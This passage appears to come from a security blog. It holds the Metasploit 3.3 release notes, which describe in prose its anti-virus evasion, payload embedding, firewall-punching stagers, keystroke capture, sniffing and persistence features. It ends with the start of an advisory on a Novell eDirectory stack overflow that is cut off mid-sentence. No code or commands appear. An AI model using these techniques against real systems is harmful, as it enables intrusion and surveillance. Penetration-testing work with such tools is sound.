by default, solving a number of issues with Mac OS X and other platforms
with broken Readline support. The console now supports and enables ANSI
colors by default, making it much easier to discern between errors and
status messages on a busy terminal.
The database functionality is now enabled by default, as long RubyGems
and at least one database driver is available on the system. The
db_drivername plugins are deprecated and the db_driver and db_create
commands are active by default. The db commands now support filters for
everything from open ports to IP ranges. The db_autopwn command now
cross-references across multiple ports and services name instead of a
single port, when the -p parameter is supplied.
All applicable exploits now have OSVDB references thanks to a major
effort by Steve Tornio. Two-ways links have been setup between the
Metasploit module browser and their matching OSVDB entries. CVE
references have been audited across the entire module tree, with a
number of typos and other fixes corrected in the process.
Oracle exploit support has been implemented through a tag-team effort
between MC and Chris Gates, with assistance from Alexander Kornbrust.
Oracle modules have been developed for exploiting TNS protocol stack and
Web-based Oracle services, as well as post-authentication database-level
privilege escalation flaws. Microsoft SQL Server support has been
overhauled, with the addition of a brand new native Ruby TDS driver
exclusive to the Metasploit Framework and a large number of new modules.
Microsoft SQL Server 2000 through 2008 versions have been tested with
the new modules. The MSSQL and Oracle login modules can now brute force
passwords from a dictionary file.
Automated client-side exploitation has been overhauled with a rewrite of
the browser_autopwn module by James Lee. A number of existing
client-side exploits have been updated to use better fingerprinting and
evasion techniques. All TCP-based exploits can now be launched through
SOCKS4, SOCKS5, and HTTP proxies.
The payload encoding library can now embed Metasploit payloads into
arbitrary executables. The -x parameter to msfencode allows an arbitrary
executable to be used as a vector for a Metasploit payload. This
significantly reduces the impact of anti-virus tests during penetration
tests and allows the use of familiar executables in social engineering
endeavors. Payloads can be generated as VBA macros for insertion into
Word documents, as Windows Scripting Hosts scripts and the standard
formats (C, Ruby, Javascript, etc).
Metasploit now supports 64-bit Windows as a target platform, with the
ability to use standard stagers, generate executables with embedded
payloads and load Meterpeter on 64-bit systems. Metasploit now supports
64-bit Linux on the PowerPC architecture as a target platform. The
alphanumeric encoders have seen a number of bug fixes and improvements
since version 3.2, including the ability to prepend alphanumeric GetEIP
code via the AllowWin32SEH parameter.
AIX support as a target platform has been improved, with a number of
additional payloads and an exploit module for the newly discovered
rpc_ttdbserverd realpath vulnerability. These payloads support versions
5.3.7 through 6.1.4 of the AIX platform and work with auxiliary modules
and the database to select the right syscall numbers for each particular
operating system revision. 32-bit PowerPC support now includes POWER and
Cell Broadband chips in the supported architecture set through an effort
by Ramon Carvalle of RiSE Security.
The reverse_tcp stager now has a configurable number of retries
(ReverseConnectRetries) and exits gracefully if the connection fails.
The reverse_tcp_allports stager will cycle through all possible outbound
ports in order to punch through host or network firewalls. The standard
Windows stagers were overhauled to use a new hashing method, support
Windows 7, allocate their own memory during staging and avoid a middle
stager by performing their own reliable transfer mechanism. The new
stager development was driven by Stephen Fewer of Harmony Security.
Support for JSP payloads has been integrated, opening the door for new
exploit modules for Java-based application engines, like Bea and Tomcat.
The existing CMD, PHP, Ruby and Perl payloads have all seen a revamp and
update to their compatibility-matching system.
Auxiliary scanner modules now instantiate a new module instance for each
thread, allowing more of the exploit mixins to be used to develop
network scanners. This greatly improved the reliability of the existing
scanners and allowed for dozens of new ones to be developed. Scanner
modules now report their progress as they scan the network and the
frequency of reports can be controlled through advanced options.
A simple fuzzer API has been added as a mixin, along with over a dozen
new fuzzer modules that demonstrate their use and capabilities. While
fuzzing is not the focus of the framework, the API is easy to use and
can meet the requirements of many on-the-spot service tests. Ryan Linn's
HTTP NTLM capture module has been integrated into the framework.
Support for the DECT COM-ON-AIR driver has been integrated into
Metasploit, along with two example modules for locating DECT base
stations and detecting active calls. The Lorcon2 library is now
supported through a new ruby-lorcon2 Ruby extension and exploit mixin.
All existing modules using the old Lorcon API have been ported. The
airpwn and dnspwn modules developed by Mike Kershaw (also one of the
Lorcon2 authors) have been integrated into the framework. The pcaprub
Ruby extension has been updated to build on Ruby 1.9.1. Max Moser's
pSnuffle packet sniffer (modeled after dsniff) has been integrated into
the framework.
The Meterpreter and VNC injection payloads now use Stephen Fewer's
Reflective DLL injection technique; the previous DLL injection stages
have been renamed and will be deprecated in a future release. The
Meterpreter now negotiates a full SSL link after the staging process has
been completed, even going so far as to fake a HTTP request over the SSL
session to mimic the traffic profile of a normal web browser. The
Metepreter AutoRunScript parameter can now support multiple scripts with
arguments. The Meterpreter can now take screen shots, provided that the
process has access to the desktop (e.g. migrated into explorer.exe),
using the ESPIA extension developed by Efrain Torres.
The Meterpreter can now capture traffic from the compromised system,
using an in-memory sniffing extension based on the MicroOLAP Packet
Sniffing SDK. This feature creates a ring buffer of up to 200,000
packets, allowing a snapshot to be downloaded and converted to a
standard pcap log file. The Meterpreter can now capture keystrokes,
including those of console logins, by migrating in the appropriate
process and using the keyscan commands. The long-missing "rm" command
has finally been added to the Meterpreter command line. The "background"
command has been added for situations when using ^Z is not feasible.
Alexander Sotirov's METSVC has been added to the framework and a
Meterpreter script has been included to automatically deploy it on a
compromised system.
The beginnings of POSIX support have been implemented by JR, targeting
the Linux and BSD platforms. The stdapi extension for POSIX has been
partially completed and should continue to improve going forward.
All Metepreter scripts now support the "-h" parameter for usage. As of
Metasploit 3.3, there are almost 30 different Metepreter scripts
included in the release, many of which were exclusively written by
Carlos Perez.
Enjoy the release!
-HD
Continue...
Hellcode Research: Novell eDirectory HTTPSTK Login Stack Overflow Vulnerability
Vendor: Novell
Product: eDirectory for Windows
Version: 8.8 SP5
Vulnerability: Stack Overflow
Description:
Vulnerability is in "/dhost/httpstk"
This vulnerability allows remote attackers to execute arbitrary code
on vulnerable installations of Novell eDirectory.
The specific flaw exists in the handling of URL parameters
when posting to the login form of the HTTPSTK web server.
(
